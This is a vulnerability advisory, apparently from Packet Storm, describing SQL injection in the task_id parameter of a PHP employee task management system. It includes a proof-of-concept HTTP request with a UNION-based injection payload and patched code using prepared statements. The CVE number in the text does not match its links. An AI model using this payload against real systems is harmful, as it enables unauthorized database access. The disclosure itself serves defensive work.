"Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219780565-6fb7a74b-ac7f-4ec2-997a-3c69abdf37f7.png)### Recommendation:> Whoever uses this CMS, should update line no (from 27 to 30) of task-details.php with the following code to avoid SQL Injection attack:```Old Code:$sql = "SELECT a.*, b.fullname FROM task_info aLEFT JOIN tbl_admin b ON(a.t_user_id = b.user_id)WHERE task_id='$task_id'";$info = $obj_admin->manage_all_info($sql);``````New Code: $sql = $obj_admin->db->prepare("SELECT a.*, b.fullname FROM task_info a LEFT JOIN tbl_admin b ON(a.t_user_id = b.user_id) WHERE task_id=:task_id ");$sql->bindparam(':task_id', $task_id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo-------------------------------------------------# Employee Task Management System - SQL Injection with low privilege authentication### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0902](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0903)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0903), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0903)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> edit-task.php> On this page task_id parameter is vulnerable to SQL Injection Attack### Description:> The employee task management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.s. Task Management (only assigned tasks) and Attendance (clock In and out)> So, if the admin assigns a task to a normal employee, an employee could perform the SQL Injection by editing that task from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ Admin assigned a task to an employee (ABC)+ ABC employee edit the task and could perform the SQL injection with vulnerable parameter (edit-task.php?task_id=765)### Request:```GET /etms/edit-task.php?task_id=765%27+and+false+union+select+1,version(),3,database(),user(),6,7--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219764941-37ede104-c4a5-4500-94f2-2fca6e051343.png)### Recommendation:> Whoever uses this CMS, should update line no 27 and 28 of edit-task.php with the following code to avoid SQL Injection attack:```Old Code:$sql = "SELECT * FROM task_info WHERE task_id='$task_id' ";$info = $obj_admin->manage_all_info($sql);``````New Code: $sql = $obj_admin->db->prepare("SELECT * FROM task_info WHERE task_id=:task_id ");$sql->bindparam(':task_id', $task_id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Source

Packet Storm